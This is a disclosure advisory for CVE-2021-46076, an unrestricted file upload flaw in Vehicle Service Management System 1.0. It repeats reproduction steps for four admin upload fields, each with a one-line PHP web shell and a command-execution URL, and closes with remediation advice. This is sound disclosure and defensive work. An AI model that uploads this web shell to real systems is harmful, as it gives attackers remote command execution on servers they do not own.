Exploit Author: P.L.Sanu
- https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
- https://nvd.nist.gov/vuln/detail/CVE-2021-46076
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076
Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.
- Login to the admin panel http://localhost/vehicle_service/admin
- Navigate to My Account section http://localhost/vehicle_service/admin/?page=user
<?php system($_GET['cmd']);?>
- Save the above php code For Ex:Cmd.php
- In My Account Section enter all the required details and browse the php file in Avatar.
- Click on update button.
- Open the avatar image in new tab.
- Add the cmd parameter in the URL and execute the commands.
- Final URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
- Execute all the system commands For Ex: id, whoami, pwd etc..
- Login to the admin panel http://localhost/vehicle_service/admin
- Navigate to User List section and click on Create New button.
<?php system($_GET['cmd']);?>
- Save the above php code For Ex:Cmd.php
- In Create New User Page enter all the required details and browse the php file in Avatar.
- Click on Save button.
- Open the avatar image in new tab.
- Add the cmd parameter in the URL and execute the commands.
- Final URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
- Execute all the system commands For Ex: id, whoami, pwd etc..
- Login to the admin panel http://localhost/vehicle_service/admin
- Navigate to Settings section http://localhost/vehicle_service/admin/?page=system_info
<?php system($_GET['cmd']);?>
- Save the above php code For Ex:Cmd.php
- In Settings Section enter all the required details and browse the php file in System Logo.
- Click on update button.
- Open the System Logo image in new tab.
- Add the cmd parameter in the URL and execute the commands.
- Final URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
- Execute all the system commands For Ex: id, whoami, pwd etc..
- Login to the admin panel http://localhost/vehicle_service/admin
- Navigate to Settings section http://localhost/vehicle_service/admin/?page=system_info
<?php system($_GET['cmd']);?>
- Save the above php code For Ex:Cmd.php
- In Settings Section enter all the required details and browse the php file in Website Cover.
- Click on update button.
- Open the Website Cover image in new tab.
- Add the cmd parameter in the URL and execute the commands.
- Final URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
- Execute all the system commands For Ex: id, whoami, pwd etc..
An attacker can able to upload malicious php file in multiple endpoints it leads to Code Execution.
It is recommended to implement the following:
- Never accept a filename and its extension directly without having a white-list filter.
- If there is no need to have Unicode characters, it is highly recommended to only accept alpha-numeric characters and only one dot as an input for the file name and the extension.
- Limit the file size to a maximum value in order to prevent denial of service attacks.
- Uploaded directory should not have any "execute" permission.
- Don't rely on client-side validation only.